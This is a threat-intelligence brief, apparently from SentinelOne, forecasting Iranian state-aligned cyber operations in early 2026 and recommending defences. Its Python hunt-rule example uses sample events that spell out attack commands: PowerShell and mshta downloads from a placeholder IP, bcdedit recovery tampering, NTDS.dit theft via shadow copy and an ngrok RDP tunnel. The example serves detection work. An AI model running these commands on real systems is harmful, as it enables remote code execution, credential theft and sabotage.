SentinelOne Intelligence Brief: Iranian Cyber Activity Outlook

To Our Partners and Customers

The following intelligence brief was sent to all SentinelOne partners and customers today:

Executive Summary

Recent U.S. and Israeli strikes against Iranian targets, followed by Iranian attacks on multiple regional locations, present a highly dynamic geopolitical situation with credible cyber threat implications. Iran has historically incorporated cyber operations into periods of regional escalation.

Given the rapid escalation of geopolitical tensions, we assess that Iranian state-aligned cyber activity is likely to intensify in the near-term based on a long track record of leveraging cyber operations for asymmetric retaliation, coercive signaling, and strategic messaging. Prior campaigns, including destructive wiper malware, infrastructure disruption, and influence operations masquerading as ‘hacktivism’, demonstrate both capability and intent to operate in the cyber domain alongside kinetic action.

At the time of publication, SentinelOne has not attributed significant malicious cyber activity directly to these recent events. We have no indications that SentinelOne or our customers are being specifically targeted in connection with these developments.

This report outlines Iran’s historical cyber posture, relevant tactics and tradecraft, and our forward-looking assessment of potential cyber responses in the days and weeks following the airstrikes.

We assess with high confidence that organizations in Israel, the United States, and allied nations are likely to face direct or indirect targeting – particularly within government, critical infrastructure, defense, financial services, academic, and media sectors.

We recommend that all clients, especially those operating in, or supporting, U.S. and Israeli infrastructure, review their security posture and preparedness accordingly.

This assessment is current as of February 28, 2026 and reflects a rapidly evolving threat environment.

Iran’s Cyber Operations to Date

Iran presents a mature, well-resourced cyber threat, with more than fifteen years of operational experience across a wide range of malicious cyber activity.

Iran uses a diverse set of cyber tools to further state objectives, particularly preservation of the Iranian regime, including:

  • Espionage and credential theft via APT34, APT39, APT42, and MuddyWater, targeting a wide range of military, civilian, telecommunications, and academic institutions, particularly against regional targets (Israel, Middle East) and the United States
  • Disruptive and destructive campaigns, notably wiper malware such as Shamoon and MeteorExpress
  • Targeted spearphishing and social engineering campaigns, supporting strategic intelligence collection across multiple industries
  • Fake hacktivist personas for plausible deniability and psychological impact (e.g., DarkBit, Cyber Av3ngers)
  • Coordinated disinformation and influence ops across Telegram, X, and compromised news outlets
  • Internet blackouts within Iran to control domestic opinion and narrative, which also blunt the effect of foreign influence operations
  • Proxy ransomware and criminal fronts blurring lines between state and financially motivated actors

Iranian cyber actors have previously aligned their operations with kinetic campaigns, acting as a force multiplier for regional allies such as Hamas or as a standalone tool of retaliation. The TTPs employed by Iranian ‘hacktivist’ personas increasingly mirror those of state-sponsored APTs, raising questions about capability sharing and formal command relationships between the two.

Expected Iranian Cyber Response to Current Events

1 – Precision Espionage Operations

Expect escalated targeting of Israeli defense, government, and intelligence networks via spearphishing, credential harvesting, and deployment of custom malware. Historically, groups such as APT34 (OilRig) and APT42 (TA453) have used legitimately obtained access to move laterally and exfiltrate strategic intelligence. U.S. military and government organizations will likely be targeted in similar campaigns.

Anticipated Targets:

  • U.S. military and government organizations
  • Israeli defense entities and affiliated research organizations
  • U.S. and Israeli diplomatic infrastructure
  • Defense contractors and supply chain partners
  • Strategic allies and locations in theater

2 – Disruptive & Destructive Tactics

Iran has a well-documented history of using destructive malware and DDoS attacks to disrupt the critical infrastructure of its adversaries. We assess a high likelihood of similar tactics being deployed against U.S. and Israeli sectors, particularly utilities and public-facing systems.

Key techniques include:

  • Deployment of wipers via fake hacktivist personas or directly attributed APT clusters
  • Exploitation of unpatched or poorly secured public-facing web services for defacement and initial access
  • Use of scheduled tasks and LOLBins to execute custom wiper malware with stealth and persistence

Anticipated Targets:

  • Transportation, Communication, Energy and Water utilities in U.S. and Israel
  • Telecom, alerting systems, and national broadcast infrastructure
  • Financial platforms and digital banking services

3 – Coordinated Influence & Disinformation Campaigns

Iranian-aligned actors are likely to amplify disinformation campaigns to shape public perception, particularly around civilian impact, military failure, and geopolitical instability. These efforts often run concurrently with real-world escalations and aim to degrade public trust in institutions.

Anticipated Themes:

  • Allegations of Israeli war crimes
  • U.S. and Israeli military losses
  • Fabricated claims of successful Iranian cyber retaliation
  • Disinformation on U.S.–Israel political division
  • Leaks of manipulated or stolen documents misattributed to Israeli insiders
  • Lack of support from the U.S. populace for ongoing strikes against Iran

4 – Probing Attacks on U.S. & Israeli Infrastructure

Iran has demonstrated readiness to expand attacks to Western infrastructure during periods of high tension. Recent examples include the exploitation of Unitronics PLCs at U.S. water treatment plants (late 2023), highlighting a shift toward ICS/OT targets. Such actions serve retaliatory and signaling purposes and are often designed to be low-impact yet high-visibility to maximize psychological effect.

Anticipated Targets:

  • U.S. defense industrial base, especially contractors supporting military action
  • Israeli military and key government organizations
  • Critical infrastructure (water, energy, transportation) in the U.S. and Israel
  • Regional partners (e.g., Jordan, UAE, Egypt, Saudi Arabia) aligned with U.S. and Israeli interests
  • Media and academic institutions reporting on the conflict

SentinelOne Detection & Monitoring Posture

SentinelOne research and detection teams have closely followed Iranian cyber actors for many years. We provide multiple layers of protection and are closely monitoring emerging threat intelligence to maximize coverage.

We extensively cover techniques known to be used by Iranian threat groups including:

  • PowerShell and script abuse
  • Proxy tools
  • Credential theft
  • Keylogger components
  • Wipers
  • Browser credential theft
  • DLL sideloading
  • Tunneling tools (ngrok/Cloudflared)
  • Scheduled task persistence
  • Remote access tool abuse
  • Active Directory reconnaissance
  • Destructive boot tampering

These protections are not Iran-specific, but they are known to be effective against the techniques these groups use.
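
As an added example (not SentinelOne code, and not the Platform Detection Library rules named in the appendix), the Python below implements hunt rules for several techniques from the coverage list above and from the “Key techniques” list under Disruptive & Destructive Tactics: boot configuration tampering via bcdedit, credential material copied out of a volume shadow copy, encoded PowerShell carrying a download cradle, scheduled tasks that launch LOLBins, and ngrok/cloudflared tunnels. The events are constructed sample telemetry with Sysmon-style field names (Image, CommandLine, QueryName), which is an assumption about the log format; the IP addresses are from a documentation range and the rule names are illustrative.

```python
"""Hunt rules for a few of the Windows techniques in the lists above, run over constructed
process-creation and DNS events. Added example, not SentinelOne code; Sysmon-style field
names are assumed and the rule names are illustrative only."""
import base64
import ntpath
import re

LOLBINS = "bitsadmin|certutil|cscript|mshta|msiexec|powershell|pwsh|regsvr32|rundll32|wscript"
TUNNEL_DOMAINS = (".ngrok.io", ".ngrok.app", ".ngrok-free.app", ".trycloudflare.com",
                  ".argotunnel.com", ".cftunnel.com")
DOWNLOAD_CRADLE = re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|"
                             r"\biwr\b|invoke-restmethod|\birm\b|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.I)
# Optional drive path, then a LOLBin name, as the first token of a scheduled-task action.
LOLBIN_LAUNCH = re.compile(r'^"?(?:[a-z]:\\[^"]*?\\)?(' + LOLBINS + r')(?:\.exe)?"?(?:\s|$)', re.I)

def encode_powershell(script):
    """The -EncodedCommand form an attacker's loader produces: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_powershell(cmdline):
    """Decoded -EncodedCommand body, or None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def rule_encoded_powershell_download(ev):
    script = decode_encoded_powershell(ev.get("CommandLine", ""))
    if script and DOWNLOAD_CRADLE.search(script):
        return "encoded PowerShell with download cradle: " + script.strip()

def rule_boot_tampering(ev):
    cl = ev.get("CommandLine", "")
    if re.search(r"bcdedit(\.exe)?\b", cl, re.I) and re.search(
            r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures|/deletevalue\s+.*safeboot", cl, re.I):
        return "boot configuration tampering: " + cl

def rule_shadow_copy_credential_access(ev):
    """Snapshot creation alone is also what backup jobs do; copying NTDS.dit or the
    SAM/SYSTEM/SECURITY hives out of the snapshot is the high-confidence signal."""
    cl = ev.get("CommandLine", "")
    if re.search(r"HarddiskVolumeShadowCopy\d+\\.*?(ntds\.dit|\\config\\(sam|system|security))\b", cl, re.I):
        return "credential material copied from shadow copy: " + cl
    if re.search(r"vssadmin(\.exe)?\s+create\s+shadow|wmic\s+shadowcopy\s+call\s+create", cl, re.I):
        return "shadow copy created from command line (correlate with a follow-on copy): " + cl

def rule_scheduled_task_lolbin(ev):
    cl = ev.get("CommandLine", "")
    if not re.search(r"schtasks(\.exe)?\s.*?/create\b", cl, re.I):
        return None
    m = re.search(r'/tr\s+(?:"([^"]*)"|(\S+))', cl, re.I)
    hit = LOLBIN_LAUNCH.match((m.group(1) or m.group(2)) if m else "")
    if hit:
        return f"scheduled task runs LOLBin {hit.group(1).lower()}: " + hit.string

def rule_tunnel_tool(ev):
    if "QueryName" in ev:  # DNS event: still fires when the tunnel binary has been renamed
        q = ev["QueryName"].lower()
        return "DNS query to tunnel provider: " + q if q.endswith(TUNNEL_DOMAINS) else None
    image = ntpath.basename(ev.get("Image", "")).lower()
    cl = ev.get("CommandLine", "")
    if image in ("ngrok.exe", "cloudflared.exe") or re.search(
            r"\b(ngrok|cloudflared)(\.exe)?\s+(tunnel|tcp|http|start|access)\b", cl, re.I):
        return "tunneling tool launched: " + cl

RULES = (rule_encoded_powershell_download, rule_boot_tampering, rule_shadow_copy_credential_access,
         rule_scheduled_task_lolbin, rule_tunnel_tool)

def hunt(events):
    """Apply every rule to every event; returns (event id, rule name, detail) triples."""
    return [(ev["id"], rule.__name__, d) for ev in events for rule in RULES if (d := rule(ev))]

EVENTS = [  # constructed sample telemetry; 198.51.100.0/24 is a documentation range
    {"id": 1, "Image": r"C:\Windows\System32\bcdedit.exe", "CommandLine": "bcdedit /set {default} recoveryenabled no"},
    {"id": 2, "Image": r"C:\Windows\System32\vssadmin.exe", "CommandLine": "vssadmin create shadow /for=C:"},
    {"id": 3, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine":
     r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\t\n.dit"},
    {"id": 4, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine":
     "powershell -nop -w hidden -enc " + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')")},
    {"id": 5, "Image": r"C:\Windows\System32\schtasks.exe", "CommandLine":
     'schtasks /create /tn Updater /tr "mshta http://198.51.100.7/u.hta" /sc minute /mo 5'},
    {"id": 6, "Image": r"C:\Users\Public\svc.exe", "CommandLine": "svc.exe tunnel run --token eyJhIjoi..."},  # renamed cloudflared
    {"id": 7, "QueryName": "region1.v2.argotunnel.com"},  # ... but its DNS lookup still stands out
    {"id": 8, "Image": r"C:\Users\Public\ngrok.exe", "CommandLine": "ngrok.exe tcp 3389"},
    {"id": 9, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -enc " + encode_powershell("Get-Date")},  # benign: no cradle
    {"id": 10, "Image": r"C:\Windows\System32\schtasks.exe", "CommandLine":
     r'schtasks /create /tn "Vendor Agent" /tr "C:\Program Files\Vendor\agent.exe" /sc onlogon'},  # benign
]

if __name__ == "__main__":
    for event_id, rule, detail in hunt(EVENTS):
        print(f"event {event_id}: {rule}: {detail}")
```

Two design points worth noting: the shadow-copy rule grades the snapshot creation lower than the copy out of the snapshot, because backup software creates snapshots routinely, and the tunnel rule keys on the DNS lookup as well as the process image, since a renamed cloudflared or ngrok binary (event 6) defeats the image check but still has to resolve its provider's domain (event 7).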

We are monitoring the situation closely and can ship new detections quickly through Platform Rules updates or Live Security Updates.

For maximum protection, we recommend:

  • Turning on Live Updates
  • Ensuring you’re opted-in to Emerging Threat Platform Rules
  • Activating Platform Detection Library rules listed in Appendix A

Recommendations

  1. Increase Vigilance Against Phishing and Credential Abuse
  • Prioritize MFA enforcement and internal phishing detection
  • Monitor for abuse of VPN, email, and collaboration platforms
  • Monitor for suspicious activity involving legitimate user accounts and applications
  2. Harden Critical Infrastructure and OT Environments
  • Patch and segment exposed ICS components, especially common HMI/PLC vendors
  • Scan all Internet-facing infrastructure and patch any vulnerable Internet-facing services
  • Consider removing or restricting network access to non-critical Internet-facing services, especially those not protected by MFA
  • Review DDoS mitigation playbooks and response procedures
  3. Monitor for Influence Operations and Fake Leaks
  • Establish rapid communication response protocols for disinformation relevant to your organization
  • Be prepared for threat actors using “hacktivist” branding and Telegram or similar platforms for communication
  • Treat claimed hacktivist activity as a possible state masquerade; determining true origin requires detailed assessment
  4. Review and Test Incident Response Plans
  • Ensure IR and SOC teams maintain heightened alert status
  • Simulate data-wipe and ransomware scenarios
  • Simulate corporate social media hijacking scenarios and prepare for account pausing and access resets
  5. Establish Clear Points of Contact
  • Ensure the organization has direct points of contact for security incident support
  • Communicate posture expectations and escalation paths internally
  6. Monitor for Activity Associated with Iranian State-Aligned Threat Actors

SentinelOne is proactively hunting for IOCs and TTPs associated with these groups. These threat hunts are being performed for all Wayfinder Threat Hunting customers. Any related hunt findings will be visible in the Wayfinder Threat Hunting dashboard.

Closing Note

This report is intended to support informed decision-making and proactive defensive measures amid a dynamic and escalating geopolitical conflict.

The cyber threat landscape associated with Iranian state-aligned actors is adaptive, and we assess that both targeting priorities and tactics may shift rapidly in response to real world developments, political statements, or perceived provocations.

We advise clients to treat this as a time-sensitive assessment and to revisit posture, incident response, and monitoring processes regularly.

For immediate questions or escalations, please contact your Client Success Lead or reach our Support teams directly at: https://www.sentinelone.com/global-services/get-support-now/

Appendix A

Customers should consider activating Platform Detection Library rules to improve coverage. The following rules are known to be effective against Iranian cyber operations:

MuddyWater

  • Possible MuddyWater DLL Drop Consistent with Audio Driver Sideloading

Credential Dumping

  • Suspicious Task Creation for Credential Harvesting
  • Python-Based Network Exploitation Tool
  • Potential LSASS Dumping Tools
  • Credential Dumping via Shadow Copy
  • Interactive NTDS Harvesting via VSS
  • Cached Domain Credential Dumping

Tunneling & Remote Access

  • Ngrok Domain Contacted
  • Cloudflared Persistent Tunnel Establishment Detected
  • Anomalous Process Initiating Cloudflare Tunnel Traffic

Collection & Exfiltration

  • Keylogging Script via PowerShell
  • Chromium Browser Info Stealer via Remote Debugging
  • Browser Credential and Cookie Data Access Attempt

PowerShell/Script Abuse

  • PowerShell Script Execution via Time Based Integer IPv4
  • Suspicious Usage of .NET Reflection via PowerShell
  • Encoded Powershell Launching Command Line Download

Defense Evasion, Impact, Discovery

  • Potential DLL Sideloading in PerfLogs Directory
  • Disk Data Wipe Attempt via Dd Utility
  • Boot Configuration Tampering via BCDEdit
  • BloodHound Active Directory Reconnaissance File Creation